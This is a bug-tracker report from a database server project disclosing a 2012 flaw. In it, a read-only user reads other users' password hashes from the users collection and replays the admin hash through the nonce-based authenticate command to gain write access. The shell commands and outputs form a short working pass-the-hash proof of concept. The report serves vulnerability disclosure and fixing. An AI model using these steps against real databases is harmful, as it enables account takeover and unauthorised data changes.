[SERVER-6031] read only user can get write priority Created: 07/Jun/12  Updated: 15/Aug/12  Resolved: 12/Jun/12

Status: Closed
Project: Core Server
Component/s: Security
Affects Version/s: None
Fix Version/s: None

Type: Bug Priority: Critical - P2
Reporter: xie zhenye Assignee: Unassigned
Resolution: Duplicate Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

all


Issue Links:
Related
is related to SERVER-4692 Read-only users should be denied acce... Closed
Operating System: ALL
Participants:

 Description   

read only user can get write priority by access other users's pwd hash

sample:
> db.system.users.find()

{ "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" } { "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

> db.$cmd.findOne(

{getnonce:1}

)

{ "nonce" : "9892be9572e9851e", "ok" : 1 }

> db.runCommand(

{ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") }

)

{ "ok" : 1 }

 Comments   
Comment by Eliot Horowitz (Inactive) [ 12/Jun/12 ]

SERVER-4692 should fix this issue.

Comment by Spencer Brody (Inactive) [ 07/Jun/12 ]

Confirmed and reproduced.

Comment by xie zhenye [ 07/Jun/12 ]

the protocol of authentication only hash the password once. it need hash twice to be securer, like sha1(sha1(user+salt+password)). and the client should send sha1(user+salt+password) to do the authentication.

Generated at Thu Feb 08 03:10:34 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.